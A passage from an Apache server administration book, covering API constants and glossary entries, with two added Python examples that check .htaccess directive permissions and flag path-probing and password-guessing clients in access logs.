DOCUMENT_LOCATION            Constant default for DocumentRoot. Can be set at compile time, like this: env CFLAGS="-Wall -DDOCUMENT_LOCATION=\"/usr/httpd/htdocs\"" ./configure. 
DONE                         Module phase handlers return DONE status when they’ve successfully satisfied a request. 
DYNAMIC_MODULE_LIMIT         The maximum number of modules that Apache can dynamically load. The default is 64, but you can set this at compile time like this: env CFLAGS="-Wall -DDYNAMIC_MODULE_LIMIT=XxX" ./configure. 
FLAG                         
GLOBAL_ONLY                  Directives with this bit set can only appear (and Apache will only interpret them if they are located) in Apache’s server-wide config files. See NOT_IN_DIRECTORY, NOT_IN_DIR_LOC_FILE, NOT_IN_FILES, NOT_IN_LIMIT, NOT_IN_LOCATION, and NOT_IN_VIRTUALHOST. 
HARD_SERVER_LIMIT            The maximum possible number of server processes. On the Windows platform, this is 1024 (threads). The default value on all other platforms is 256. You can set this at compile time like this: env CFLAGS="-Wall -DHARD_SERVER_LIMIT=1024" ./configure. 
HTTPD_ROOT                   The same as ServerRoot, this is where Apache resides (for example, /usr/local/apache). You can set this at compile time like this: env CFLAGS="-Wall -DHTTPD_ROOT=\"/usr/httpd\"" ./configure. 
HTTP_ACCEPTED                Constant denoting HTTP Accepted status. Apache received the response and is processing it. 
HTTP_BAD_GATEWAY             Denotes HTTP Bad Gateway status. Apache, acting as a proxy, contacted an upstream server which in turn issued a bad, flawed, or incomprehensible response. 
HTTP_BAD_REQUEST             Denotes HTTP Bad Request status. The client sent a request with bad syntax, and Apache can’t understand it. 
HTTP_CONFLICT  Denotes HTTP status 409 Conflict. Apache couldn't complete the request because it conflicts with the current state of the resource (a WebDAV operation against a resource someone else changed, for instance).

HTTP_CONTINUE  Denotes HTTP status 100 Continue. Apache has read the request headers and permits the client to go on sending the request body.

HTTP_CREATED  Denotes HTTP status 201 Created. Apache satisfied the request and, as a result, created a new resource.

HTTP_FORBIDDEN  Denotes HTTP status 403 Forbidden. Apache refuses to return the requested resource, and authenticating will not change that (compare HTTP_UNAUTHORIZED).

HTTP_GATEWAY_TIME_OUT  Denotes HTTP status 504 Gateway Time Out. The upstream server never returned any data to Apache, which is running as a proxy.

HTTP_GONE  Denotes HTTP status 410 Gone. The requested resource is permanently unavailable and left no forwarding address.

HTTP_INTERNAL_SERVER_ERROR  Denotes HTTP status 500 Internal Server Error. The server encountered an unexpected condition (a CGI script whose headers trail off prematurely, for example). The details go to the error log, not to the client.

HTTP_LENGTH_REQUIRED  Denotes HTTP status 411 Length Required. Apache refuses to accept the request without a Content-Length header.

HTTP_METHOD_NOT_ALLOWED  Denotes HTTP status 405 Method Not Allowed. Apache forbids this request method for the specified URI.

HTTP_MOVED_PERMANENTLY  Denotes HTTP status 301 Moved Permanently. The requested resource has been assigned a new permanent URI.

HTTP_MOVED_TEMPORARILY  Denotes HTTP status 302 (Moved Temporarily in HTTP/1.0, Found in HTTP/1.1). The requested resource resides temporarily at a different URI.

HTTP_MULTIPLE_CHOICES  Denotes HTTP status 300 Multiple Choices. Apache has several representations of the requested resource: which one does the client want?

HTTP_NON_AUTHORITATIVE  Denotes HTTP status 203 Non-Authoritative Information. The metadata in the response headers is not the origin server's definitive set but came from a local or third-party copy.

HTTP_NOT_ACCEPTABLE  Denotes HTTP status 406 Not Acceptable. The document exists, but none of its representations matches the content characteristics the client's Accept headers ask for.

HTTP_NOT_FOUND  Denotes HTTP status 404 Not Found. Apache couldn't find the requested resource.

HTTP_NOT_IMPLEMENTED  Denotes HTTP status 501 Not Implemented. Apache doesn't support the specified method.

HTTP_NOT_MODIFIED  Denotes HTTP status 304 Not Modified. A conditional GET request was satisfied, but the target document remains unmodified, so no body is sent.
HTTP_NO_CONTENT  Denotes HTTP status 204 No Content. Apache processed the request but has nothing to return.

HTTP_OK  Denotes HTTP status 200 OK. All is well; Apache performed the requested operation successfully.

HTTP_PARTIAL_CONTENT  Denotes HTTP status 206 Partial Content. Apache served the byte range the client asked for.

HTTP_PAYMENT_REQUIRED  Denotes HTTP status 402 Payment Required. Reserved for future use; Apache never generates it.

HTTP_PRECONDITION_FAILED  Denotes HTTP status 412 Precondition Failed. A precondition the client stated in its request headers (If-Match, If-Unmodified-Since) evaluated false on the server.

HTTP_PROXY_AUTHENTICATION_REQUIRED  Denotes HTTP status 407 Proxy Authentication Required. The client must authenticate itself to the proxy and then retry.

HTTP_REQUEST_ENTITY_TOO_LARGE  Denotes HTTP status 413 Request Entity Too Large. The client sent a request body larger than the server will accept (see LimitRequestBody), perhaps trying to eat your resources.

HTTP_REQUEST_TIME_OUT  Denotes HTTP status 408 Request Time Out. The client did not send a complete request within the server's Timeout.

HTTP_REQUEST_URI_TOO_LARGE  Denotes HTTP status 414 Request URI Too Long. The request line exceeded the limit (see LimitRequestLine), perhaps trying to eat your resources or to overflow a buffer.

HTTP_RESET_CONTENT  Denotes HTTP status 205 Reset Content. The request succeeded, and the user agent should reset the document view that sent it.

HTTP_SEE_OTHER  Denotes HTTP status 303 See Other. The client should use a GET to retrieve the result from the URI in the Location header.

HTTP_SERVICE_UNAVAILABLE  Denotes HTTP status 503 Service Unavailable. The server is temporarily unable to handle the request because of overload or maintenance.

HTTP_SWITCHING_PROTOCOLS  Denotes HTTP status 101 Switching Protocols.

HTTP_UNAUTHORIZED  Denotes HTTP status 401 Unauthorized. The request requires HTTP authentication, and the client supplied either no credentials or credentials Apache rejected.

HTTP_UNSUPPORTED_MEDIA_TYPE  Denotes HTTP status 415 Unsupported Media Type.

HTTP_USE_PROXY  Denotes HTTP status 305 Use Proxy.

HTTP_VARIANT_ALSO_VARIES  Denotes HTTP status 506 Variant Also Negotiates.

HTTP_VERSION_NOT_SUPPORTED  Denotes HTTP status 505 HTTP Version Not Supported.

HUGE_STRING_LEN  Defines the largest static string buffer Apache uses for a line or header (8192 bytes; same as MAX_STRING_LEN).

ITERATE  Directive argument type: one argument, which may be repeated; the handler is called once per argument.

ITERATE2  Directive argument type: a fixed first argument followed by one or more further arguments; the handler is called once per further argument, each time with the first.
kill_conditions  Enumeration of how Apache treats a child process it spawned (a CGI or piped-log process) when the pool it belongs to is cleaned up: kill_never (never signaled), kill_always (SIGKILL on pool cleanup), kill_after_timeout (SIGTERM, wait three seconds, then SIGKILL), just_wait (wait forever for it to exit), and kill_only_once (SIGTERM, then wait).

LF  Defines a name for the line-feed character's value (10).

MAX_STRING_LEN  Defines the largest static string buffer Apache uses (same as HUGE_STRING_LEN).

MODULE_MAGIC_COOKIE  Magic value stored in every module structure; Apache checks it to verify that a loaded object really is a module built against a compatible structure layout.

MODULE_MAGIC_NUMBER  The old single API version number. Obsolete; kept for modules that still test it. See MODULE_MAGIC_NUMBER_MAJOR and MODULE_MAGIC_NUMBER_MINOR.

MODULE_MAGIC_NUMBER_MAJOR  The API version, incremented on incompatible changes. Apache refuses to load a module compiled against a different major number.

MODULE_MAGIC_NUMBER_MINOR  Incremented on backward-compatible additions to the API. Modules test for a feature with the MODULE_MAGIC_AT_LEAST(major, minor) macro.

MULTI_ERR  Thread error return value.

MULTI_OK  Thread success return value.

MULTI_TIMEOUT  Thread timeout return value.

M_CONNECT  Method number for the HTTP CONNECT method. The M_* numbers identify the request method (compare r->method_number) and are what <Limit> and <LimitExcept> restrictions are keyed on.

M_COPY  Method number for the WebDAV COPY method.

M_DELETE  Method number for the HTTP DELETE method.

M_GET  Method number for the HTTP GET method (HEAD shares it, with r->header_only set).

M_INVALID  Method number assigned to a request method Apache does not recognize.

M_LOCK  Method number for the WebDAV LOCK method.

M_MKCOL  Method number for the WebDAV MKCOL method.

M_MOVE  Method number for the WebDAV MOVE method.

M_OPTIONS  Method number for the HTTP OPTIONS method.

M_PATCH  Method number for the PATCH method.

M_POST  Method number for the HTTP POST method.

M_PROPFIND  Method number for the WebDAV PROPFIND method.

M_PUT  Method number for the HTTP PUT method.

M_TRACE  Method number for the HTTP TRACE method.

M_UNLOCK  Method number for the WebDAV UNLOCK method.

NOT_IN_DIRECTORY  The directive is rejected inside a <Directory> container.

NOT_IN_DIR_LOC_FILE  The directive is rejected inside <Directory>, <Location>, and <Files> containers.

NOT_IN_FILES  The directive is rejected inside a <Files> container.

NOT_IN_LIMIT  The directive is rejected inside a <Limit> container.

NOT_IN_LOCATION  The directive is rejected inside a <Location> container.

NOT_IN_VIRTUALHOST  The directive is rejected inside a <VirtualHost> container.

NO_ARGS  Directive argument type: the directive takes no arguments.
OK  Return value meaning the handler ran successfully and no error occurred; Apache proceeds with the request.

OPT_ALL  Options All.

OPT_EXECCGI  Options ExecCGI (CGI scripts may run in this directory).

OPT_INCLUDES  Options Includes (server-side includes).

OPT_INCNOEXEC  Options IncludesNOEXEC (server-side includes, but no #exec and no #include of CGI scripts).

OPT_INDEXES  Options Indexes (automatic directory listings when no index file exists).

OPT_MULTI  Options MultiViews.

OPT_NONE  Options None.

OPT_SYM_LINKS  Options FollowSymLinks.

OPT_SYM_OWNER  Options SymLinksIfOwnerMatch.

OPT_UNSET  Internal marker meaning no Options directive applied at this level, so the value is inherited from the parent.

OR_AUTHCFG  Directive allowed in *.conf inside <Directory> or <Location>, and in .htaccess when AllowOverride AuthConfig is in effect.

OR_FILEINFO  Directive allowed anywhere in *.conf, and in .htaccess when AllowOverride FileInfo is in effect.

OR_INDEXES  Directive allowed anywhere in *.conf, and in .htaccess when AllowOverride Indexes is in effect.

OR_LIMIT  Directive allowed in *.conf inside <Directory> or <Location>, and in .htaccess when AllowOverride Limit is in effect.

OR_OPTIONS  Directive allowed anywhere in *.conf, and in .htaccess when AllowOverride Options is in effect.

proxyreqtype  Enumeration of proxy request types (none, forward proxy, reverse proxy) used by the proxy modules.

RAW_ARGS  Directive argument type: the handler receives the rest of the line as one raw string and parses it itself.

REQUEST_NO_BODY  Policy passed to ap_setup_client_block: the request must not carry a body, and Apache rejects one that does.

RSRC_CONF  Directive allowed in *.conf outside <Directory> or <Location> (the server-wide and <VirtualHost> context), and never in .htaccess.

SECURITY_HOLE_PASS_AUTHORIZATION  Compile-time define. When set, Apache passes the client's Authorization header, credentials and all, to CGI scripts as HTTP_AUTHORIZATION. It is off by default because any script that runs, including a compromised one, could then harvest users' passwords.

SERVER_BUSY_DNS  Scoreboard state: the child is doing a DNS lookup.

SERVER_BUSY_KEEPALIVE  Scoreboard state: the child is waiting on a keep-alive connection.

SERVER_BUSY_LOG  Scoreboard state: the child is writing a log entry.

SERVER_BUSY_READ  Scoreboard state: the child is reading a request from a client.

SERVER_BUSY_WRITE  Scoreboard state: the child is sending a response to a client.

SERVER_DEAD  Scoreboard state: the slot has no running child.

SERVER_GRACEFUL  Scoreboard state: the child is finishing its current request and exiting during a graceful restart.

SERVER_NUM_STATUS  The number of distinct scoreboard states.

SERVER_READY  Scoreboard state: the child is idle and ready to accept a connection.

SERVER_STARTING  Scoreboard state: the child is starting up.

SERVER_SUPPORT  URL at which to seek support for Apache.

SERVER_VERSION  String containing Apache's server version; ServerTokens controls how much of it the Server header reveals.

START_PREQUEST  Marker passed to ap_time_process_request to record in the scoreboard that a request's processing has started.

STOP_PREQUEST  Marker passed to ap_time_process_request to record in the scoreboard that a request's processing has stopped.
TAKE1  Directive argument type: exactly one argument.

TAKE12  Directive argument type: one or two arguments.

TAKE123  Directive argument type: one, two, or three arguments.

TAKE13  Directive argument type: one or three arguments.

TAKE2  Directive argument type: exactly two arguments.

TAKE23  Directive argument type: two or three arguments.

TAKE3  Directive argument type: exactly three arguments.

TARGET  Compile-time definition of the name of the main Apache executable (httpd by default); it is also used to name the shared core library when Apache is built with a shared core.
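The OR_*, RSRC_CONF and TAKE*/FLAG/ITERATE constants in the table only make sense together: when Apache reads a directive, it checks the directive's req_override bits against the context it is in (which is how AllowOverride keeps a .htaccess file from turning on CGI or rebinding Listen), and then checks the argument count against its cmd_how. The Python below is an added example, not code from the book or from Apache; it models that check. The bit values follow Apache 1.3's http_config.h, the directive subset and its flags are assumed to match the 1.3 core and mod_mime command tables, and the .htaccess text is constructed for the example.

```python
"""Model of the context and argument-count checks Apache applies to each
configuration directive (example code; not Apache's own).

Bit values follow Apache 1.3 http_config.h. The directive table is a small
constructed subset whose flags are assumed to match the 1.3 core and mod_mime
command tables."""
import shlex

# Override / context bits: which configuration contexts a directive may appear in.
OR_LIMIT, OR_OPTIONS, OR_FILEINFO, OR_AUTHCFG, OR_INDEXES = 1, 2, 4, 8, 16
ACCESS_CONF, RSRC_CONF = 64, 128
OR_ALL = OR_LIMIT | OR_OPTIONS | OR_FILEINFO | OR_AUTHCFG | OR_INDEXES

# Argument-count rules (the cmd_how enumeration).
(NO_ARGS, RAW_ARGS, TAKE1, TAKE2, TAKE12, TAKE3,
 TAKE123, ITERATE, ITERATE2, FLAG) = range(10)
FIXED_ARITY = {NO_ARGS: (0,), TAKE1: (1,), TAKE2: (2,), TAKE12: (1, 2),
               TAKE3: (3,), TAKE123: (1, 2, 3)}

# Constructed directive table: name -> (req_override, cmd_how).
DIRECTIVES = {
    "AuthType": (OR_AUTHCFG, TAKE1),
    "Require": (OR_AUTHCFG, RAW_ARGS),
    "Options": (OR_OPTIONS, ITERATE),
    "AddHandler": (OR_FILEINFO, ITERATE2),
    "Order": (OR_LIMIT, TAKE1),
    "DirectoryIndex": (OR_INDEXES, ITERATE),
    "ContentDigest": (OR_ALL, FLAG),
    "Listen": (RSRC_CONF, TAKE1),
    "ServerRoot": (RSRC_CONF, TAKE1),
}

# AllowOverride keyword -> bit(s) it grants to .htaccess files.
ALLOWOVERRIDE = {"none": 0, "all": OR_ALL, "limit": OR_LIMIT,
                 "options": OR_OPTIONS, "fileinfo": OR_FILEINFO,
                 "authconfig": OR_AUTHCFG, "indexes": OR_INDEXES}


def override_mask(allowoverride):
    """Turn the argument list of an AllowOverride directive into a bitmask."""
    mask = 0
    for word in allowoverride.split():
        mask |= ALLOWOVERRIDE[word.lower()]
    return mask


def check_args(how, args):
    """Return None if the argument list fits cmd_how, else an error string."""
    n = len(args)
    if how == RAW_ARGS:
        return None
    if how == FLAG:
        ok = n == 1 and args[0].lower() in ("on", "off")
        return None if ok else "must be On or Off"
    if how == ITERATE:
        return None if n >= 1 else "takes one or more arguments"
    if how == ITERATE2:
        return None if n >= 2 else "takes a fixed argument followed by one or more"
    allowed = FIXED_ARITY[how]
    if n in allowed:
        return None
    return "takes %s argument(s)" % "/".join(str(k) for k in allowed)


def check_directive(line, context_mask):
    """Mimic invoke_cmd(): the directive is rejected unless its req_override
    bits intersect the current context's mask; then its arguments are counted."""
    words = shlex.split(line)
    if not words:
        return None
    name, args = words[0], words[1:]
    if name not in DIRECTIVES:
        return "Invalid command '%s'" % name
    req_override, how = DIRECTIVES[name]
    if not (req_override & context_mask):
        return "%s not allowed here" % name
    err = check_args(how, args)
    return "%s %s" % (name, err) if err else None


def check_htaccess(text, allowoverride):
    """Check every directive in a .htaccess file under the given AllowOverride
    setting. Returns the list of error messages; empty means Apache would
    accept the whole file."""
    mask = override_mask(allowoverride)
    errors = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        err = check_directive(line, mask)
        if err:
            errors.append(err)
    return errors


# Constructed .htaccess: a user who wants CGI in their directory and, while at
# it, tries to change a server-wide setting.
SAMPLE_HTACCESS = """
AuthType Basic
Require valid-user
Options +ExecCGI
AddHandler cgi-script .cgi .pl
Listen 8080
ContentDigest Maybe
"""

if __name__ == "__main__":
    for policy in ("None", "AuthConfig", "All"):
        print("AllowOverride %s -> %s" % (policy, check_htaccess(SAMPLE_HTACCESS, policy)))
```

With AllowOverride None every line is refused; with AuthConfig only the two authentication directives pass; even with All, Listen is refused because RSRC_CONF is never granted to .htaccess, and ContentDigest fails its FLAG check. That is the whole security value of the OR_* bits: the server administrator decides which classes of directive a directory owner may set.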





Summary 
This quick reference was precisely that, and not intended for folks actively develop- 
ing Apache modules. For specific information on Apache module development, 
please see Chapter 18, “Hacking Homegrown Apache Modules.” 


E 
Glossary 


This glossary defines terms common to Apache usage or 
Web hosting in general. 


%e The %{VAR}e Apache LogFormat directive records the contents of the environment 
variable VAR (for example, one set with SetEnvIf) for the request; it does not define 
the variable. See Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


%b The %b Apache LogFormat directive records the total 
number of bytes sent (not including headers) in common 
log format. See Chapter 9, “Spotting Crackers: Apache 
Logging Facilities.” 


%f The %f Apache LogFormat directive records the file- 
name requested. See Chapter 9, “Spotting Crackers: Apache 
Logging Facilities.” 


%h The %h Apache LogFormat directive records the remote 
host’s address. See Chapter 9, “Spotting Crackers: Apache 
Logging Facilities.” 


%l The %l Apache LogFormat directive records the remote logname as reported by 
the client machine’s identd server (RFC 1413). Apache asks only when IdentityCheck 
is On and otherwise logs a hyphen; even when present, the value is supplied by the 
remote machine and can’t be trusted. See Chapter 9, “Spotting Crackers: Apache 
Logging Facilities.” 


%P The %P Apache LogFormat directive records the process 
ID of the process that satisfied the client’s request. See 
Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


%p The %p Apache LogFormat directive records the canonical port of the server 
that served the request. See Chapter 9, “Spotting Crackers: Apache Logging 
Facilities.” 


%r The %r Apache LogFormat directive records the first 
line of the client’s request. See Chapter 9, “Spotting 
Crackers: Apache Logging Facilities.” 
%s The %s Apache LogFormat directive records the status of the client’s request. See 
Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


%t The %t Apache LogFormat directive records the time of the request in common 
log format by default. See Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


%T The %T Apache LogFormat directive records the time taken, in seconds, to satisfy 
the client’s request. See Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 


%u The %u Apache LogFormat directive records the remote user name from HTTP 
authentication. Apache logs the name the client supplied, so when the status (%s) is 
401 the name is an unauthenticated guess. See Chapter 9, “Spotting Crackers: Apache 
Logging Facilities.” 


%U The %U Apache LogFormat directive records the URL path the client requested, 
not including any query string. See Chapter 9, “Spotting Crackers: Apache Logging 
Facilities.” 


%v The %v Apache LogFormat directive records the canonical name of the server 
that filled the request. See Chapter 9, “Spotting Crackers: Apache Logging Facilities.” 
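The LogFormat directives are easiest to read side by side with a real log line. The Python below is an added example (not code from the book or from Apache): it parses lines written with the stock common and combined LogFormat strings, names each field by its % directive, and then applies two of the checks Chapter 9’s log reviewer would want, counting 404s per host (a scanner probing for script paths, per the 404 entry later in this glossary) and 401s per host (password guessing, per the 401 entry). The log lines are constructed for the example and the thresholds are arbitrary.

```python
"""Parse Apache common/combined log lines field by LogFormat directive and
flag clients worth a second look (example code; not from the book or Apache).
The log lines at the bottom are constructed for the example."""
import re
from collections import Counter, defaultdict

# Matches "%h %l %u %t \"%r\" %>s %b" (common log format), optionally followed
# by "\"%{Referer}i\" \"%{User-agent}i\"" (combined). The pattern does not
# handle escaped quotes inside %r; such lines land in the unparsed bucket.
LOG_RE = re.compile(
    r'^(?P<h>\S+) (?P<l>\S+) (?P<u>\S+) \[(?P<t>[^\]]+)\] '
    r'"(?P<r>[^"]*)" (?P<s>\d{3}) (?P<b>\d+|-)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?\s*$'
)


def parse_line(line):
    """Return a dict keyed by LogFormat directive letter, or None if the line
    does not match. %b of '-' (no body) becomes 0, and %r is split into the
    method, %U (the path without any query string) and the protocol."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["s"] = int(rec["s"])
    rec["b"] = 0 if rec["b"] == "-" else int(rec["b"])
    parts = rec["r"].split(" ")
    rec["method"] = parts[0]
    rec["U"] = parts[1].split("?", 1)[0] if len(parts) > 1 else ""
    rec["protocol"] = parts[2] if len(parts) > 2 else ""
    return rec


def suspicious_hosts(lines, max_404=3, max_401=3):
    """Two rules over a batch of log lines:
    - more than max_404 status-404 responses to one host: a scanner probing
      for known script paths;
    - more than max_401 status-401 responses to one host: password guessing
      against a protected area (remember that %u is the name the client
      claimed, not a verified user).
    Returns {host: [reasons]}; lines that did not parse are returned under the
    key '__unparsed__', because a client can deliberately send requests that
    break naive log parsing."""
    per_host = defaultdict(Counter)
    unparsed = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            unparsed.append(line)
            continue
        per_host[rec["h"]][rec["s"]] += 1
    findings = {}
    for host, codes in per_host.items():
        reasons = []
        if codes[404] > max_404:
            reasons.append("%d x 404: path probing" % codes[404])
        if codes[401] > max_401:
            reasons.append("%d x 401: password guessing" % codes[401])
        if reasons:
            findings[host] = reasons
    if unparsed:
        findings["__unparsed__"] = unparsed
    return findings


# Constructed sample access_log (common and combined formats mixed).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2002:13:55:36 -0700] "GET /index.html HTTP/1.0" 200 2326
10.0.0.5 - - [10/Oct/2002:13:55:37 -0700] "GET /images/logo.gif HTTP/1.0" 200 1024 "http://www.example.com/" "Mozilla/4.0"
192.0.2.7 - - [10/Oct/2002:14:01:02 -0700] "GET /cgi-bin/phf HTTP/1.0" 404 209
192.0.2.7 - - [10/Oct/2002:14:01:02 -0700] "GET /cgi-bin/test-cgi HTTP/1.0" 404 209
192.0.2.7 - - [10/Oct/2002:14:01:03 -0700] "GET /scripts/root.exe HTTP/1.0" 404 209
192.0.2.7 - - [10/Oct/2002:14:01:03 -0700] "GET /_vti_bin/shtml.exe HTTP/1.0" 404 209
192.0.2.7 - - [10/Oct/2002:14:01:04 -0700] "GET /admin.php?id=1 HTTP/1.0" 404 209
198.51.100.9 - bob [10/Oct/2002:14:05:00 -0700] "GET /private/ HTTP/1.0" 401 401
198.51.100.9 - bob [10/Oct/2002:14:05:01 -0700] "GET /private/ HTTP/1.0" 401 401
198.51.100.9 - bob [10/Oct/2002:14:05:02 -0700] "GET /private/ HTTP/1.0" 401 401
198.51.100.9 - bob [10/Oct/2002:14:05:03 -0700] "GET /private/ HTTP/1.0" 401 401
198.51.100.9 - bob [10/Oct/2002:14:05:04 -0700] "GET /private/ HTTP/1.0" 200 512
this line is not a log entry
"""

if __name__ == "__main__":
    for host, reasons in sorted(suspicious_hosts(SAMPLE_LOG.splitlines()).items()):
        print(host, reasons)
```

Run as a script it reports 192.0.2.7 for path probing, 198.51.100.9 for password guessing (four 401s for user bob, then a 200: the guess that worked), and the line that did not parse. Real thresholds depend on the site; the point is that %h, %s and %u together carry enough to spot both patterns without any extra tooling.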


-d serverroot Apache command-line option that lets you specify at runtime the 
value of ServerRoot. See Chapter 8, “Overlording Apache Server: General 
Administration.” 


-f config Apache command-line option that reads the server configuration from 
config instead of the compiled-in default (conf/httpd.conf under ServerRoot). See 
Chapter 8, “Overlording Apache Server: General Administration.” 


-C directive Apache command-line option that processes the specified directive 
before reading the configuration files; its lowercase counterpart, -c directive, 
processes the directive after the configuration files. See Chapter 8, “Overlording 
Apache Server: General Administration.” 


-D parameter Apache command-line option that defines parameter for conditional 
processing: directives inside an <IfDefine parameter> container are honored only 
when that name is defined. See Chapter 8, “Overlording Apache Server: General 
Administration.” 


-h Apache command-line option that calls an abbreviated help message. See 
Chapter 8, “Overlording Apache Server: General Administration.” 


-l Apache command-line option that lists the modules compiled into the Apache 
server. See Chapter 8, “Overlording Apache Server: General Administration.” 


-L Apache command-line option that lists every configuration directive the server 
understands, with its arguments and the contexts in which it may appear. See 
Chapter 8, “Overlording Apache Server: General Administration.” 


-S An Apache command-line option that shows the virtual host settings as parsed 
from the configuration files. (In version 2.0, -S is equivalent to -t -DDUMP_VHOSTS.) 
See Chapter 8, “Overlording Apache Server: General Administration.” 


-t An Apache command-line option that runs syntax tests on configuration files. 
See Chapter 8, “Overlording Apache Server: General Administration.” 
-T An Apache command-line option that runs syntax tests on configuration files, 
except those in the default document roots. (This flag faded from version 2.0, and is 
therefore applicable to earlier versions only.) See Chapter 8, “Overlording Apache 
Server: General Administration.” 


-X An Apache command-line option that runs the server in single-process mode for 
debugging. It prevents forking. See Chapter 8, “Overlording Apache Server: General 
Administration.” 


-v An Apache command-line option that prints what Apache version you're using. 
See Chapter 8, “Overlording Apache Server: General Administration.” 


-V An Apache command-line option that prints Apache’s version together with its 
compile-time settings (such as HTTPD_ROOT and SERVER_CONFIG_FILE). See Chapter 8, 
“Overlording Apache Server: General Administration.” 


httpd-2.0/modules/ In the Apache CVS source tree, the directory that stores 
module files and source code. See Chapter 14, “Apache Under the Hood: Open 
Source and Security.” 


httpd-2.0/modules/aaa/ In the Apache CVS source tree, the directory that stores 
mod_access.c, mod_auth.c, mod_auth_anon.c, mod_auth_db.c, mod_auth_dbm.c, and 
mod_auth_digest.c. See Chapter 14, “Apache Under the Hood: Open Source and 
Security.” 


httpd-2.0/modules/arch/ In the Apache CVS source tree, the directory that stores 
mod_isapi.c, mod_win32.c, and mod_nw_ssl.c (NetWare + SSL). See Chapter 14, 
“Apache Under the Hood: Open Source and Security.” 


httpd-2.0/modules/cache/ In the Apache CVS source tree, the directory that stores 
mod_file_cache.c. See Chapter 14, “Apache Under the Hood: Open Source and 
Security.” 


httpd-2.0/modules/dav/ In the Apache CVS source tree, the directory that stores 
liveprop.c, mod_dav.c, props.c, providers.c, std_liveprop.c, util.c, 
util_lock.c, dbm.c, lock.c, mod_dav_fs.c, and repos.c. See Chapter 14, “Apache 
Under the Hood: Open Source and Security.” 


httpd-2.0/modules/echo/ In the Apache CVS source tree, the directory that stores 
mod_echo.c. See Chapter 14, “Apache Under the Hood: Open Source and Security.” 


httpd-2.0/modules/experimental/ In the Apache CVS source tree, the directory 
that stores cache_storage.c, cache_util.c, mod_cache.c, mod_case_filter.c, 
mod_case_filter_in.c, mod_charset_lite.c, mod_disk_cache.c, mod_example.c, 
mod_ext_filter.c, and mod_mem_cache.c. See Chapter 14, “Apache Under the Hood: 
Open Source and Security.” 


httpd-2.0/modules/filters/ In the Apache CVS source tree, the directory that 
stores mod_include.c. See Chapter 14, “Apache Under the Hood: Open Source and 
Security.” 


httpd-2.0/modules/generators/ In the Apache CVS source tree, the directory that 
stores mod_asis.c, mod_autoindex.c, mod_cgi.c, mod_cgid.c, mod_info.c, 
mod_status.c, and mod_suexec.c. See Chapter 14, “Apache Under the Hood: Open 
Source and Security.” 


httpd-2.0/modules/http/ In the Apache CVS source tree, the directory that stores 
http_core.c, http_protocol.c, http_request.c, and mod_mime.c. See Chapter 14, 
“Apache Under the Hood: Open Source and Security.” 


httpd-2.0/modules/loggers/ In the Apache CVS source tree, the directory that 
stores mod_log_config.c. See Chapter 14, “Apache Under the Hood: Open Source 
and Security.” 


httpd-2.0/modules/mappers/ In the Apache CVS source tree, the directory that 
stores mod_actions.c, mod_alias.c, mod_dir.c, mod_imap.c, mod_negotiation.c, 
mod_rewrite.c, mod_so.c, mod_speling.c, mod_userdir.c, and mod_vhost_alias.c. 
See Chapter 14, “Apache Under the Hood: Open Source and Security.” 


httpd-2.0/modules/metadata/ In the Apache CVS source tree, the directory that 
stores mod_cern_meta.c, mod_env.c, mod_expires.c, mod_headers.c, 
mod_mime_magic.c, mod_setenvif.c, mod_unique_id.c, and mod_usertrack.c. See 
Chapter 14, “Apache Under the Hood: Open Source and Security.” 


httpd-2.0/modules/proxy/ In the Apache CVS source tree, the directory that stores 
mod_proxy.c, proxy_connect.c, proxy_ftp.c, proxy_http.c, and proxy_util.c. See 
Chapter 14, “Apache Under the Hood: Open Source and Security.” 


httpd-2.0/modules/ssl/ In the Apache CVS source tree, the directory that stores 
mod_ssl.c, ssl_engine_config.c, ssl_engine_dh.c, ssl_engine_ds.c, 
ssl_engine_ext.c, ssl_engine_init.c, ssl_engine_io.c, ssl_engine_kernel.c, 
ssl_engine_log.c, ssl_engine_mutex.c, ssl_engine_pphrase.c, 
ssl_engine_rand.c, ssl_engine_vars.c, ssl_expr.c, ssl_expr_eval.c, 
ssl_expr_parse.c, ssl_expr_scan.c, ssl_scache.c, ssl_scache_dbm.c, 
ssl_scache_shmcb.c, ssl_scache_shmht.c, ssl_util.c, ssl_util_ssl.c, and 
ssl_util_table.c. See Chapter 14, “Apache Under the Hood: Open Source and 
Security.” 


httpd-2.0/modules/test/ In the Apache CVS source tree, the directory that stores 
mod_optional_fn_export.c, mod_optional_fn_import.c, 
mod_optional_hook_export.c, and mod_optional_hook_import.c. See Chapter 14, 
“Apache Under the Hood: Open Source and Security.” 
/usr/local/apache/conf/access.conf The default location on many Apache 1.3 
installations of Apache’s access configuration file, a holdover from the original 
three-file layout. Current 1.3 installations keep everything in httpd.conf and ship 
this file empty, and Apache 2.0 dropped it. See Chapter 14, “Apache Under the Hood: 
Open Source and Security.” 


/usr/local/apache/conf/httpd.conf The default location on many Apache instal- 
lations of Apache’s main configuration file. See Chapter 14, “Apache Under the 
Hood: Open Source and Security.” 


/usr/local/apache/conf/mime.types The default location on many Apache instal- 
lations of Apache’s MIME configuration file. See Chapter 14, “Apache Under the 
Hood: Open Source and Security.” 


/usr/local/apache/conf/srm.conf The default location on many Apache 1.3 installa- 
tions of Apache’s resource configuration file, the second file of the old three-file 
layout. Like access.conf, it ships empty on current 1.3 installations and is gone in 
2.0. See Chapter 14, “Apache Under the Hood: Open Source and Security.” 


/usr/local/apache/logs/access_log The default location on many Apache instal- 
lations of Apache’s access log. See Chapter 14, “Apache Under the Hood: Open 
Source and Security.” 


/usr/local/apache/logs/error_log The default location on many Apache installa- 
tions of Apache’s error log. See Chapter 14, “Apache Under the Hood: Open Source 
and Security.” 


/usr/local/apache/logs/httpd.pid The default location on many Apache installa- 
tions of Apache’s process identifier. See Chapter 14, “Apache Under the Hood: Open 
Source and Security.” 


$ Use $ to read an environment variable. Syntax varies from language to language. 
In Perl, to read REMOTE_HOST, pull it from the %ENV hash: $ENV{'REMOTE_HOST'}. In 
PHP, use $_SERVER['REMOTE_HOST']; the bare $REMOTE_HOST form works only with 
register_globals on, which lets any client inject variables into your script and 
